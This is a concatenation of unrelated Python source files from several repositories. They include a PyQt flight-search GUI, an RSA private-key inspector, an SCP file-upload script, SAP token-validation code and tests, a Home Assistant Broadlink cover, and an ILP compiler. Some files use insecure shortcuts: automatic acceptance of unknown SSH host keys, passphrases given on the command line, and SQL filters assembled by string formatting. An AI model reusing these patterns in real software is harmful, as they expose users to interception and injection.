self.dateEdit.setSizePolicy(sizePolicy)
self.dateEdit.setDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setMaximumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 12, 31), QtCore.QTime(23, 59, 59)))
self.dateEdit.setMinimumDateTime(QtCore.QDateTime(QtCore.QDate(2019, 1, 1), QtCore.QTime(0, 0, 0)))
self.dateEdit.setObjectName("dateEdit")
self.horizontalLayout_4.addWidget(self.dateEdit)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_class = QtWidgets.QLabel(self.centralwidget)
self.label_class.setAlignment(QtCore.Qt.AlignCenter)
self.label_class.setObjectName("label_class")
self.horizontalLayout_5.addWidget(self.label_class)
self.comboBox_class = QtWidgets.QComboBox(self.centralwidget)
self.comboBox_class.setObjectName("comboBox_class")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.comboBox_class.addItem("")
self.horizontalLayout_5.addWidget(self.comboBox_class)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.Search = QtWidgets.QPushButton(self.centralwidget)
self.Search.setObjectName("Search")
self.verticalLayout.addWidget(self.Search)
self.horizontalLayout.addLayout(self.verticalLayout)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.horizontalLayout.addItem(spacerItem)
self.output_search = QtWidgets.QTableView(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.output_search.sizePolicy().hasHeightForWidth())
self.output_search.setSizePolicy(sizePolicy)
self.output_search.setObjectName("output_search")
self.horizontalLayout.addWidget(self.output_search)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 567, 21))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
self.menu_2 = QtWidgets.QMenu(self.menubar)
self.menu_2.setObjectName("menu_2")
self.menu_3 = QtWidgets.QMenu(self.menu_2)
self.menu_3.setObjectName("menu_3")
self.menu_4 = QtWidgets.QMenu(self.menu_2)
self.menu_4.setObjectName("menu_4")
MainWindow.setMenuBar(self.menubar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.toolBar_2 = QtWidgets.QToolBar(MainWindow)
self.toolBar_2.setObjectName("toolBar_2")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_2)
self.toolBar_3 = QtWidgets.QToolBar(MainWindow)
self.toolBar_3.setObjectName("toolBar_3")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar_3)
self.statusBar = QtWidgets.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionregister = QtWidgets.QAction(MainWindow)
self.actionregister.setObjectName("actionregister")
self.actionbuy = QtWidgets.QAction(MainWindow)
self.actionbuy.setObjectName("actionbuy")
self.action1 = QtWidgets.QAction(MainWindow)
self.action1.setObjectName("action1")
self.actionds = QtWidgets.QAction(MainWindow)
self.actionds.setObjectName("actionds")
self.actionkj = QtWidgets.QAction(MainWindow)
self.actionkj.setObjectName("actionkj")
self.menu.addAction(self.actionregister)
self.menu_3.addAction(self.action1)
self.menu_3.addAction(self.actionds)
self.menu_4.addAction(self.actionkj)
self.menu_2.addAction(self.menu_3.menuAction())
self.menu_2.addAction(self.menu_4.menuAction())
self.menubar.addAction(self.menu.menuAction())
self.menubar.addAction(self.menu_2.menuAction())
self.retranslateUi(MainWindow)
self.Search.clicked.connect(self.searchresult)
self.login.clicked.connect(self.function_login)
self.register_2.clicked.connect(self.function_register)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def function_login(self):
child_login, child_login_ui = login.Ui_Dialog.instantiation(login)
child_login_ui.button_connect(child_login, main_ui.login)
def function_register(self):
child_register, child_register_ui = register.Ui_Dialog.instantiation(register)
child_register_ui.button_connect(child_register, main_ui.register_2)
def searchresult(self):
# query_departure = QSqlQuery()
# query_departure.prepare("SELECT 机场代码 FROM 机场 where 所在城市 = :departure")
# query_departure.bindValue(":departure", self.comboBox_departure.currentText())
# query_departure.exec_()
# list_departure = list()
# while query_departure.next():
# print(query_departure.value(0))
#
# query_destination = QSqlQuery()
# query_destination.prepare("SELECT 机场代码 FROM 机场 where 所在城市 = :destination")
# query_destination.bindValue(":destination", self.comboBox_destination.currentText())
# query_destination.exec_()
# list_destination = list()
# while query_destination.next():
# print(query_destination.value(0))
        query_flight = QSqlQuery()  # create a new QSqlQuery object
        query_flight.prepare('SELECT 航班编号 FROM 航班 '
                             'WHERE 航班.出发机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :departure) '
                             'and 航班.到达机场代码 in (SELECT 机场代码 FROM 机场 where 所在城市 = :destination)')  # prepare the SQL statement
        query_flight.bindValue(":departure", self.comboBox_departure.currentText())
        query_flight.bindValue(":destination", self.comboBox_destination.currentText())  # bind the placeholders to the selected cities
        query_flight.exec_()  # execute the query
        flight_ids = []
        while query_flight.next():
            flight_ids.append("'" + query_flight.value(0) + "'")
        flight = "(" + ",".join(flight_ids) + ")"  # flight : ('A','B',...)
        self.model = QSqlTableModel()  # create a new QSqlTableModel object
        self.output_search.setModel(self.model)  # attach the model to the table view
        self.model.setTable('飞行计划安排')  # acts as the FROM clause
        self.model.setFilter("航班编号 in %s" % (flight))  # acts as the WHERE clause
        print(self.model.filter())
        self.model.select()  # run the SQL SELECT
        self.output_search.show()  # display the results
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_departure.setText(_translate("MainWindow", "Departure"))
self.comboBox_departure.setCurrentText(_translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_departure.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_departure.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_departure.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_departure.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_departure.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_departure.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_departure.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_departure.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_departure.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_departure.setItemText(10, _translate("MainWindow", "南昌"))
self.label_destination.setText(_translate("MainWindow", "Destination"))
self.comboBox_destination.setItemText(0, _translate("MainWindow", "北京"))
self.comboBox_destination.setItemText(1, _translate("MainWindow", "成都"))
self.comboBox_destination.setItemText(2, _translate("MainWindow", "香港"))
self.comboBox_destination.setItemText(3, _translate("MainWindow", "哈尔滨"))
self.comboBox_destination.setItemText(4, _translate("MainWindow", "海南"))
self.comboBox_destination.setItemText(5, _translate("MainWindow", "上海"))
self.comboBox_destination.setItemText(6, _translate("MainWindow", "长春"))
self.comboBox_destination.setItemText(7, _translate("MainWindow", "兰州"))
self.comboBox_destination.setItemText(8, _translate("MainWindow", "广州"))
self.comboBox_destination.setItemText(9, _translate("MainWindow", "长沙"))
self.comboBox_destination.setItemText(10, _translate("MainWindow", "南昌"))
self.label_date.setText(_translate("MainWindow", "DATE"))
self.label_class.setText(_translate("MainWindow", "Class"))
self.comboBox_class.setItemText(0, _translate("MainWindow", "头等舱"))
self.comboBox_class.setItemText(1, _translate("MainWindow", "商务舱"))
self.comboBox_class.setItemText(2, _translate("MainWindow", "经济舱"))
self.Search.setText(_translate("MainWindow", "Search"))
self.menu.setTitle(_translate("MainWindow", "注册"))
self.menu_2.setTitle(_translate("MainWindow", "功能"))
self.menu_3.setTitle(_translate("MainWindow", "用户"))
self.menu_4.setTitle(_translate("MainWindow", "管理员"))
self.toolBar.setWindowTitle(_translate("MainWindow", "toolBar"))
self.toolBar_2.setWindowTitle(_translate("MainWindow", "toolBar_2"))
self.toolBar_3.setWindowTitle(_translate("MainWindow", "toolBar_3"))
self.actionregister.setText(_translate("MainWindow", "用户注册"))
self.actionbuy.setText(_translate("MainWindow", "机票购买"))
self.action1.setText(_translate("MainWindow", "机票购买"))
self.actionds.setText(_translate("MainWindow", "我的机票"))
self.actionkj.setText(_translate("MainWindow", "添加数据"))
``` |
{
"source": "519seven/cs627",
"score": 4
} |
#### File: 519seven/cs627/examine_rsa.py
```python
''' Input: private key in PKCS#1 or PKCS#8 format
Output: decimal representations of key data,
or HEX if --hex is passed in '''
import argparse
import sys
from Crypto.PublicKey import RSA
def get_args():
''' Build argument object '''
parser = argparse.ArgumentParser(
description='RSA key examiner'
)
parser.add_argument(
'-k',
'--key',
help='Specify the location of your RSA key',
required=True
)
parser.add_argument(
'-p',
'--passphrase',
help='Supply your key passphrase',
default=None
)
parser.add_argument(
'--hex',
dest='hex',
help='Output in HEX? (default is decimal)',
action='store_true'
)
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
passphrase = args.passphrase
    # The key must be a private key: d, p and u are private-key components.
    with open(args.key, 'r') as key_file:
        private_key = RSA.importKey(key_file.read(), passphrase)
    if args.hex:
        print(f"n: {hex(private_key.n)}")
        print(f"e: {hex(private_key.e)}")
        print(f"d: {hex(private_key.d)}")
        print(f"p: {hex(private_key.p)}")
        print(f"u: {hex(private_key.u)}")
        sys.exit(0)
    print(f"n: {private_key.n}")
    print(f"e: {private_key.e}")
    print(f"d: {private_key.d}")
    print(f"p: {private_key.p}")
    print(f"u: {private_key.u}")
    sys.exit(0)
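# Hypothetical usage sketch (the key path and passphrase below are made-up examples):
#   python examine_rsa.py --key ~/.ssh/id_rsa --passphrase hunter2 --hex
#   python examine_rsa.py -k key.pem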
``` |
{
"source": "519seven/python_snippets",
"score": 2
} |
#### File: 519seven/python_snippets/scptoweb-climockup.py
```python
from paramiko import RSAKey
from paramiko import SSHClient
from paramiko import SSHException
from paramiko import AutoAddPolicy
from scp import SCPClient # https://pypi.org/project/scp/
import logging
import logging.handlers
import os
import sys
import syslog
import json
import shlex
import subprocess as subp
syslog.openlog("scptoweb")
def check_env_vars():
i = 5
for param in ['WEBSERVER', 'PORT', 'FILESDIR', 'SCPUSER', 'PKEY', 'KNOWNHOSTS']:
try:
os.environ[param]
except KeyError:
print("{0} env var must be set prior to calling this script".format(param))
sys.exit(i)
i += 1
def load_env_vars():
source = 'source ./env_vars.sh'
    dump = '/usr/bin/env python3 -c "import os, json; print(json.dumps(dict(os.environ)))"'
    command = ['/bin/bash', '-c', '{0} && {1}'.format(source, dump)]
proc = subp.Popen(command, stdout=subp.PIPE)
env = json.loads(proc.stdout.read())
os.environ = env
print(env)
def ssh_connect(webserver, port, scpuser, knownhosts):
    syslog.syslog(syslog.LOG_ALERT, "Starting scptoweb ...")
    rsakey = RSAKey.from_private_key_file(f"/Users/{scpuser}/.ssh/rsa_id")
    ssh = SSHClient()
    ssh.load_system_host_keys(filename=knownhosts)
    ssh.set_missing_host_key_policy(AutoAddPolicy())
    syslog.syslog(syslog.LOG_ALERT, 'Connecting to {0} ...'.format(webserver))
    ssh.connect(webserver, port=port, username=scpuser, pkey=rsakey, auth_timeout=22)
    return ssh
def scan_and_upload(ssh_conn, filesdir):
    with SCPClient(ssh_conn.get_transport()) as scp:
        print('Scanning {0} ...'.format(filesdir))
        for entry in os.scandir(filesdir):
            # DirEntry.name is the bare filename; str(entry) would give "<DirEntry 'x'>"
            if entry.name.endswith((".pdf", ".doc", ".docx")):
                scp.put(entry.path, remote_path='Site_Files')
        scp.close()
## Loading the environment
def main():
''' Load env vars, connect, scan and upload '''
load_env_vars()
check_env_vars()
WEBSERVER = os.environ['WEBSERVER']
PORT = os.environ['PORT']
FILESDIR = os.environ['FILESDIR']
SCPUSER = os.environ['SCPUSER']
PKEY = os.environ['PKEY']
KNOWNHOSTS = os.environ['KNOWNHOSTS']
    ssh_conn = ssh_connect(WEBSERVER, int(PORT), SCPUSER, KNOWNHOSTS)
    scan_and_upload(ssh_conn, FILESDIR)
if __name__ == "__main__":
main()
``` |
{
"source": "51acorsi/cloud-pysec",
"score": 2
} |
#### File: sap/xssec/__init__.py
```python
from typing import Dict
from sap.xssec.security_context_ias import SecurityContextIAS
from sap.xssec.security_context_xsuaa import SecurityContextXSUAA
def create_security_context_xsuaa(token, service_credentials: Dict[str, str]):
"""
Creates the XSUAA Security Context by validating the received access token.
:param token: string containing the access_token
:param service_credentials: dict containing the uaa/ias credentials
:return: SecurityContextXSUAA object
"""
return SecurityContextXSUAA(token, service_credentials)
def create_security_context_ias(token, service_credentials: Dict[str, str]):
"""
Creates the IAS Security Context by validating the received access token.
:param token: string containing the access_token
:param service_credentials: dict containing the uaa/ias credentials
:return: SecurityContextIAS object
"""
return SecurityContextIAS(token, service_credentials)
create_security_context = create_security_context_xsuaa
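# Minimal usage sketch (the credential values below are placeholders, not a real binding):
#
#   uaa_credentials = {"clientid": "...", "clientsecret": "...", "url": "..."}
#   ctx = create_security_context(access_token, uaa_credentials)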
```
#### File: sap/xssec/security_context_ias.py
```python
import logging
from typing import List, Dict
from urllib3.util import Url, parse_url # type: ignore
from sap.xssec.jwt_audience_validator import JwtAudienceValidator
from sap.xssec.jwt_validation_facade import JwtValidationFacade, DecodeError
from sap.xssec.key_cache import KeyCache
from sap.xssec.key_cache_v2 import get_verification_key_ias
class SecurityContextIAS(object):
""" SecurityContextIAS class """
verificationKeyCache = KeyCache()
def __init__(self, token: str, service_credentials: Dict[str, str]):
self.token = token
self.service_credentials = service_credentials
self.logger = logging.getLogger(__name__)
self.jwt_validator = JwtValidationFacade()
self.audience_validator = JwtAudienceValidator(self.service_credentials["clientid"])
try:
self.token_payload = self.jwt_validator.decode(token, False)
self.token_header = self.jwt_validator.get_unverified_header(token)
self.validate_issuer().validate_timestamp().validate_audience().validate_signature()
except DecodeError:
raise ValueError("Failed to decode provided token")
def get_issuer(self):
return self.token_payload.get("ias_iss") or self.token_payload["iss"]
def validate_issuer(self):
"""
check `ias_iss` or `iss` in jwt token
"""
issuer_url: Url = parse_url(self.get_issuer())
if issuer_url.scheme != "https":
raise ValueError("Token's issuer has wrong protocol ({})".format(issuer_url.scheme))
if issuer_url.query is not None:
raise ValueError("Token's issuer has unallowed query value ({})".format(issuer_url.query))
if issuer_url.fragment is not None:
raise ValueError("Token's issuer has unallowed hash value ({})".format(issuer_url.fragment))
domains: List[str] = self.service_credentials.get("domains") or (
[self.service_credentials["domain"]] if "domain" in self.service_credentials else [])
if not any(map(lambda d: issuer_url.host.endswith(d), domains)):
raise ValueError("Token's issuer is not found in domain list {}".format(", ".join(domains)))
return self
def validate_timestamp(self):
"""
check `exp` in jwt token
"""
if self.jwt_validator.has_token_expired(self.token):
raise ValueError("Token has expired")
return self
def validate_audience(self):
"""
check `aud` in jwt token
"""
validation_result = self.audience_validator.validate_token(audiences_from_token=self.token_payload["aud"])
if validation_result is False:
raise RuntimeError('Audience Validation Failed')
return self
def validate_signature(self):
"""
check signature in jwt token
"""
verification_key: str = get_verification_key_ias(
self.get_issuer(), self.token_payload.get("zone_uuid"), self.token_header["kid"])
result_code = self.jwt_validator.loadPEM(verification_key)
if result_code != 0:
raise RuntimeError('Invalid verification key, result code {0}'.format(result_code))
self.jwt_validator.checkToken(self.token)
error_description = self.jwt_validator.getErrorDescription()
if error_description != '':
raise RuntimeError(
'Error in validation of access token: {0}, result code {1}'.format(
error_description, self.jwt_validator.getErrorRC()))
return self
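# Usage sketch: constructing the context runs the full validation chain
# (issuer -> timestamp -> audience -> signature) and raises on the first failure.
# The credential values here are placeholders:
#
#   ctx = SecurityContextIAS(token, {"clientid": "...", "domains": ["accounts400.ondemand.com"]})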
```
#### File: tests/ias/ias_tokens.py
```python
from tests.jwt_tools import sign
def merge(dict1, dict2):
result = dict1.copy()
result.update(dict2)
return result
HEADER = {
"alg": "RS256",
"kid": "kid-custom"
}
PAYLOAD = {
"sub": "<EMAIL>",
"iss": "https://tenant.accounts400.ondemand.com",
"groups": "CONFIGURED_GROUP",
"given_name": "Vorname",
"aud": [
"clientid"
],
"user_uuid": "db60e49c-1fb7-4a15-9a9e-8ababf856fe9",
"azp": "70af88d4-0371-4374-b4f5-f24f650bfac5",
"zone_uuid": "4b0c2b7a-1279-4352-a68d-a9a228a4f1e9",
"iat": 1470815434,
"exp": 2101535434,
"family_name": "Nachname",
"jti": "b23fa11e-3455-49f4-b0c3-a141e648e6ae",
"email": "<EMAIL>"
}
VALID_TOKEN = sign(PAYLOAD, headers=HEADER)
VALID_TOKEN_WITH_CUSTOM_DOMAIN = sign(merge(PAYLOAD, {
"ias_iss": "https://tenant.accounts400.ondemand.com",
"iss": "https://tenant.custom.domain.com",
}), headers=HEADER)
TOKEN_INVALID_ISSUER = sign(merge(PAYLOAD, {
"iss": "https://wrong-domain",
}), headers=HEADER)
TOKEN_INVALID_AUDIENCE = sign(merge(PAYLOAD, {
"aud": ["wrong-client"],
}), headers=HEADER)
TOKEN_EXPIRED = sign(merge(PAYLOAD, {
"exp": 1470815434,
}), headers=HEADER)
```
#### File: cloud-pysec/tests/test_req_token.py
```python
import asyncio
import unittest
from unittest.mock import patch
from os import environ, path, devnull
import socket
from time import sleep
from subprocess import Popen
from sap.xssec import jwt_validation_facade, constants
from sap import xssec
from tests import uaa_configs
from tests import jwt_payloads
from tests.jwt_tools import sign
import requests
from tests.keys import CLIENT_X509_CERTIFICATE, CLIENT_X509_KEY
TEST_SERVER_POLL_ATTEMPTS = 10
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(('', 0))
_, port = tcp.getsockname()
tcp.close()
return port
flask_env = environ.copy()
flask_env['FLASK_APP'] = path.join(path.dirname(
path.abspath(__file__)), 'utils', 'uaa_mock.py')
flask_port = str(get_free_tcp_port())
flask_url = 'http://localhost:' + flask_port
# Event loop for running async functions in tests
loop = asyncio.get_event_loop()
class ReqTokenForClientTest(unittest.TestCase):
DEVNULL = None
flask_process = None
@classmethod
def setUpClass(cls):
""" Test class static setup """
environ["SAP_EXT_JWT_ALG"] = "*"
cls.DEVNULL = open(devnull, 'w')
cls.flask_process = Popen(['flask', 'run', '-p', flask_port, '-h', 'localhost'],
env=flask_env, stdout=cls.DEVNULL, stderr=cls.DEVNULL)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
poll = 0
while poll != TEST_SERVER_POLL_ATTEMPTS:
try:
sleep(1)
poll += 1
s.connect(('localhost', int(flask_port)))
print('Test server is up!') # pylint: disable=superfluous-parens
break
except socket.error as e:
if poll == TEST_SERVER_POLL_ATTEMPTS:
print(
'Test server could not start!') # pylint: disable=superfluous-parens
raise e
s.close()
jwt_validation_facade.ALGORITHMS = ['RS256', 'HS256']
@classmethod
def tearDownClass(cls):
if cls.flask_process:
cls.flask_process.terminate()
if cls.DEVNULL:
cls.DEVNULL.close()
def _request_token_for_client_error(self, sec_context, url, error_message_end):
service_credentials = {
'clientid': 'clientid',
'clientsecret': 'clientsecret',
'url': url
}
with self.assertRaises(RuntimeError) as ctx:
sec_context.request_token_for_client(service_credentials, None)
self.assertTrue(str(ctx.exception).endswith(error_message_end))
def _setup_get_error(self, mock):
mock.side_effect = requests.exceptions.SSLError
def _req_client_service_credentials(self):
service_credentials = {
'clientid': 'clientid',
'clientsecret': 'clientsecret',
'url': flask_url + '/correct'
}
return service_credentials
def _req_client_sec_context(self):
sec_context = xssec.create_security_context(
sign(jwt_payloads.USER_TOKEN_JWT_BEARER_FOR_CLIENT), uaa_configs.VALID['uaa'])
return sec_context
@patch('httpx.get')
def test_req_client_for_user_401_error(self, mock_get):
self._setup_get_error(mock_get)
        sec_context = self._req_client_sec_context()
expected_message = \
'Authorization header invalid, requesting client does'\
' not have grant_type={} or no scopes were granted.'.format(constants.GRANTTYPE_JWT_BEARER)
self._request_token_for_client_error(
sec_context, flask_url + '/401', expected_message)
@patch('httpx.get')
def test_req_client_for_user_500_error(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
self._request_token_for_client_error(
sec_context, flask_url + '/500', 'HTTP status code: 500')
@patch('httpx.get')
def test_req_client_for_user(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
service_credentials = self._req_client_service_credentials()
token = sec_context.request_token_for_client(service_credentials, None)
self.assertEqual(token, 'access_token')
@patch('httpx.get')
def test_req_client_for_user_with_mtls(self, mock_get):
self._setup_get_error(mock_get)
sec_context = xssec.create_security_context(
sign(jwt_payloads.USER_TOKEN_JWT_BEARER_FOR_CLIENT), uaa_configs.VALID['uaa'])
service_credentials = {
'clientid': 'clientid',
'certificate': CLIENT_X509_CERTIFICATE,
'key': CLIENT_X509_KEY,
'certurl': flask_url + '/mtls'
}
        # completing without an exception exercises the mTLS request path
        token = sec_context.request_token_for_client(service_credentials, None)
@patch('httpx.get')
def test_req_client_for_user_async(self, mock_get):
self._setup_get_error(mock_get)
sec_context = self._req_client_sec_context()
service_credentials = self._req_client_service_credentials()
coro = sec_context.request_token_for_client_async(service_credentials)
token = loop.run_until_complete(coro)
self.assertEqual(token, 'access_token')
``` |
{
"source": "51acorsi/homeassistant-broadlink-cover",
"score": 2
} |
#### File: homeassistant-broadlink-cover/cover/broadlink.py
```python
from datetime import timedelta
from base64 import b64encode, b64decode
import asyncio
import binascii
import logging
import socket
import voluptuous as vol
from homeassistant.util.dt import utcnow
from homeassistant.util import Throttle
from homeassistant.components.cover import (CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE, SUPPORT_STOP)
from homeassistant.const import (
CONF_FRIENDLY_NAME, CONF_COMMAND_OPEN,
CONF_COMMAND_CLOSE, CONF_COMMAND_STOP,
CONF_COVERS, CONF_TIMEOUT,
CONF_HOST, CONF_MAC)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['broadlink==0.9.0']
_LOGGER = logging.getLogger(__name__)
TIME_BETWEEN_UPDATES = timedelta(seconds=5)
DOMAIN = 'broadlink'
DEFAULT_NAME = 'Broadlink cover'
DEFAULT_TIMEOUT = 10
DEFAULT_RETRY = 3
COVER_SCHEMA = vol.Schema({
vol.Optional(CONF_COMMAND_OPEN, default=None): cv.string,
vol.Optional(CONF_COMMAND_CLOSE, default=None): cv.string,
vol.Optional(CONF_COMMAND_STOP, default=None): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_COVERS, default={}):
vol.Schema({cv.slug: COVER_SCHEMA}),
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MAC): cv.string,
vol.Optional(CONF_FRIENDLY_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int
})
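# A hypothetical configuration.yaml entry matching the schema above
# (host, mac and the base64 packets are placeholder values):
#
# cover:
#   - platform: broadlink
#     host: 192.168.1.2
#     mac: 'AA:BB:CC:DD:EE:FF'
#     covers:
#       bedroom_blind:
#         friendly_name: "Bedroom blind"
#         command_open: 'JgBQAA=='
#         command_close: 'JgBQAQ=='
#         command_stop: 'JgBQAg=='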
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Broadlink covers."""
import broadlink
devices = config.get(CONF_COVERS)
ip_addr = config.get(CONF_HOST)
friendly_name = config.get(CONF_FRIENDLY_NAME)
mac_addr = binascii.unhexlify(
config.get(CONF_MAC).encode().replace(b':', b''))
broadlink_device = broadlink.rm((ip_addr, 80), mac_addr, None)
covers = []
for object_id, device_config in devices.items():
covers.append(
BroadlinkRMCover(
device_config.get(CONF_FRIENDLY_NAME, object_id),
broadlink_device,
device_config.get(CONF_COMMAND_OPEN),
device_config.get(CONF_COMMAND_CLOSE),
device_config.get(CONF_COMMAND_STOP)
)
)
broadlink_device.timeout = config.get(CONF_TIMEOUT)
try:
broadlink_device.auth()
except socket.timeout:
_LOGGER.error("Failed to connect to device")
add_devices(covers)
class BroadlinkRMCover(CoverDevice):
"""Representation of an Broadlink cover."""
def __init__(self, friendly_name, device, command_open, command_close, command_stop):
"""Initialize the cover."""
self._name = friendly_name
self._state = False
self._command_open = b64decode(command_open) if command_open else None
self._command_close = b64decode(command_close) if command_close else None
self._command_stop = b64decode(command_stop) if command_stop else None
self._device = device
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of entity."""
return True
@property
def should_poll(self):
"""Return the polling state."""
return False
@property
def is_closed(self):
"""Return true if device is closed."""
return self._state
@property
def supported_features(self):
support_features = 0
if self._command_open is not None:
support_features |= SUPPORT_OPEN
if self._command_close is not None:
support_features |= SUPPORT_CLOSE
if self._command_stop is not None:
support_features |= SUPPORT_STOP
return support_features
def open_cover(self, **kwargs):
"""Open the cover."""
self._sendpacket(self._command_open)
def close_cover(self, **kwargs):
"""Close the cover."""
self._sendpacket(self._command_close)
def stop_cover(self, **kwargs):
"""Stop the cover."""
self._sendpacket(self._command_stop)
def _sendpacket(self, packet, retry=2):
"""Send packet to device."""
if packet is None:
_LOGGER.debug("Empty packet")
return True
try:
self._device.send_data(packet)
except (socket.timeout, ValueError) as error:
if retry < 1:
_LOGGER.error(error)
return False
if not self._auth():
return False
return self._sendpacket(packet, retry-1)
return True
def _auth(self, retry=2):
try:
auth = self._device.auth()
except socket.timeout:
auth = False
if not auth and retry > 0:
return self._auth(retry-1)
return auth
``` |
{
"source": "51alg/TerpreT",
"score": 2
} |
#### File: TerpreT/bin/compile_ilp.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib"))
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "lib", 'ilp'))
from docopt import docopt
import traceback
import pdb
import ast
import astunparse
import tptv1
import utils as u
import unroller
import imp
from ilp_utils import LPWriter, CaseNode, SwitchGroup, Declaration, Constant
from lp2matrix import LPCompiler
lpw = LPWriter()
def ensure_dir(f):
d = os.path.dirname(f)
if not os.path.exists(d):
os.makedirs(d)
def make_matlab_filename(filename):
return filename.replace("_", "").replace(".py", ".m")
def parse_set_to(expr_node):
assert isinstance(expr_node, ast.Expr), "set_to node should be Expr"
call_node = u.cast(expr_node.value, ast.Call)
attribute_node = u.cast(call_node.func, ast.Attribute)
name_node = u.cast(attribute_node.value, ast.Name)
lhs_var = name_node.id
possible_attributes = ["set_to", "set_to_constant", "observe_value", "set_message"]
assert attribute_node.attr in possible_attributes, "unexpected attribute " + ast.dump(attribute_node)
op, args = u.parse_factor_expression(call_node.args[0])
if attribute_node.attr == "set_to_constant":
assert op is None, "set_to_constant isn't a constant"
op = "SetToConstant"
elif attribute_node.attr == "set_to":
if op is None:
op = "Copy"
elif attribute_node.attr == "observe_value":
assert op is None, "observe_value isn't a constant"
op = "ObserveValue"
return lhs_var, [op] + args
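# A sketch of what parse_set_to returns, based on the cases above:
#   foo.set_to_constant(3)   ->  ("foo", ["SetToConstant", 3])
#   foo.set_to(Add(a, b))    ->  ("foo", ["Add", "a", "b"])
#   foo.observe_value(1)     ->  ("foo", ["ObserveValue", 1])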
class Factor(object):
def __init__(self, expr_node, case_node):
self.var_name, factor = parse_set_to(expr_node)
self.f = factor[0]
self.arg_names = factor[1:]
self.context = case_node
def resolve_variables(self):
self.decl = self.context.resolve_variable(self.var_name)
self.args = []
for arg_name in self.arg_names:
if isinstance(arg_name, int):
self.args.append(arg_name)
else:
arg = self.context.resolve_variable(arg_name)
self.args.append(arg)
def is_observation(self):
return self.f == "ObserveValue"
def is_constant(self):
return self.f == "SetToConstant"
def __repr__(self):
return "%s.set_to(%s(%s, %s))" % (self.var_name, self.f, self.arg_names,
self.context.context_str())
def scope(self):
all_vars = [self.decl] + self.args
return filter(lambda x: isinstance(x, Declaration), all_vars)
def scope_names(self):
return [decl.var for decl in self.scope()]
# return [self.var_name] + self.arg_names
def local_marginal(self):
scope_str = ",".join([decl.name for decl in self.scope()])
return "%s_<%s>" % (scope_str, self.context.context_str())
def make_switch_group(if_node, parent_case):
cases_ast = u.if_and_or_else_blocks(if_node)
switch_group = SwitchGroup(None, parent_case.num_switch_groups())
switch_group.set_parent_case(parent_case)
switch_group.var_name = None
for if_node in cases_ast:
compare_node = u.cast(if_node.test, ast.Compare)
var_name, val = u.parse_compare(compare_node)
if switch_group.var_name is None:
switch_group.var_name = var_name
else:
assert var_name == switch_group.var_name, "if blocks must switch on same var"
case_node = make_case_node(if_node.body, var_name, val)
switch_group.add_case(val, case_node)
return switch_group
def make_case_node(body, var_name, val):
case_node = CaseNode(var_name, val)
for ch in body:
if isinstance(ch, ast.If):
switch_group = make_switch_group(ch, case_node)
case_node.add_switch_group(switch_group)
elif isinstance(ch, ast.Assign):
if u.is_constant_definition(ch):
const = Constant(ch, case_node)
case_node.add_constant(const)
else:
decl = Declaration(ch, case_node)
case_node.add_declaration(decl)
elif (isinstance(ch, ast.FunctionDef) and
filter(lambda x: x.func.id=='Runtime',ch.decorator_list)):
case_node.add_runtime_function(ch)
elif isinstance(ch, ast.Expr):
factor = Factor(ch, case_node)
case_node.add_factor(factor)
else:
case_node.unhandled.append(ch)
